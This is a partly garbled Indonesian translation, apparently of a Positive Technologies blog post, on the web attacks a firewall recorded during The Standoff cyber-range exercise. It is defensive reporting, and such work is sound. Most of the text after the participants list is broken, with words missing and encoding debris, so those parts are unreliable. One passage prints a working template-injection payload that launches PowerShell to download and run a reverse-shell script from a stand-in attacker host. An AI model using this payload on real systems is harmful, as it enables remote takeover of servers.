Di The Standoff terakhir, kami, tim PT Expert Security Center , paralel dengan peserta konfrontasi dari sisi pertahanan, memantau infrastruktur situs dan kantor individu dari salinan digital kota metropolitan yang ditempatkan di poligon cyber kami. Untuk melakukan ini, kami mengerahkan pusat operasi keamanan (SOC) tambahan , yang seolah-olah menutupi seluruh infrastruktur, yang karenanya "melihat" semua aktivitas peserta The Standoff dan bahkan sedikit lebih. Salah satu tools dari SOC ini adalah PT Application Firewall - sebuah web application layer firewall (baca tentang hasil kerja alat SOC kami yang lain - PT Sandbox - di salah satu artikel kami sebelumnya). Di bawah ini kami akan fokus secara eksklusif pada apa yang terjadi di situs dari sudut pandang web dan target apa yang dipilih tim penyerang.
Statistik serangan umum
Sebagai bagian dari The Standoff, kami memantau serangan di portal situs itu sendiri, serta pada 30 sumber daya web yang termasuk dalam infrastruktur permainan di tempat pelatihan. Ini adalah sumber daya yang digunakan baik dalam permainan utama (Pengukur kantor 25 Jam - sumber daya untuk mentransmisikan pembacaan pengukur, Konsul untuk Nuft - platform manajemen layanan, yang akan dibahas di bawah), dan dalam bug bounty (misalnya, CMS Umbraco untuk Bank of FF, Mantis Bugtracker for 25 Hours adalah sistem pelacakan bug untuk produk perangkat lunak, rConfir RCE adalah layanan manajemen konfigurasi jaringan untuk Big Bro Group). Tim membaca menerima poin untuk menerapkan risiko, serta mencari kerentanan dalam sistem dan pelaporan.
Siapa yang di poligon cyber:
- Heavy Ship Logistics โ , , , ;
- 25 Hours โ , , , ;
- Tube โ , , , ;
- Nuft โ , ;
- Big Bro Group โ ;
- Bank of FF โ .
โ , . โ , bug bounty, ยซยป , . 13. bug bounty . ยซยป, (, RCE Flack BookStore SQL Injection โ capture the flag). 29 30 - ( , ). , , web application firewall.
The Standoff PT Application Firewall โ .
. 1 . , โ , โ , โ . , , . .
( The Standoff 12:00 12 14:00 17 ).
, PT Application Firewall, , , , . . , , , . , .
ube Bank of FF: CMS Made Simple (CMS), bbord ( ), CMS Umbraco, Prestoshop ( ), Avideo encoder ( ), FHEM tomcat ( ), Consul, openEMR ( ), ATutor ( ) rConfig.
. nmap Burp Suite Python Go: Metasploit. burp suite, Metasploit, Responder-.
30 , , , 5 6 2 6 . , โ , .
.
ยซ 25 Hoursยป Meters. , . HubL, {{}} . , , . : {{7*7}} , 7*7.
:
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval("var x=new java.lang.ProcessBuilder(\"cmd.exe\",\"/c\",\"powershell -exec bypass IEX (New-Object Net.WebClient).DownloadString('http://attacker-ip/mini-reverse.ps1');\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())")}}.
.
, (, ), ( ) .
โ , Nuft Consul. . Server Side Request Forgery, Gopher PUT .
200 .
, ( โ ) ( โ ).
( false positive) . .
proofs of concept , . , , , .
, CMS Umbraco ( Bank of FF) , - POST; .
, Meters, , โ .
request path .
30 . , . . , (ODBC) backup ยซยป .
, ( The Standoff) , , . web application firewall. PT Application Firewall , . , false positive , .
Positive Technologies (PT Expert Security Center)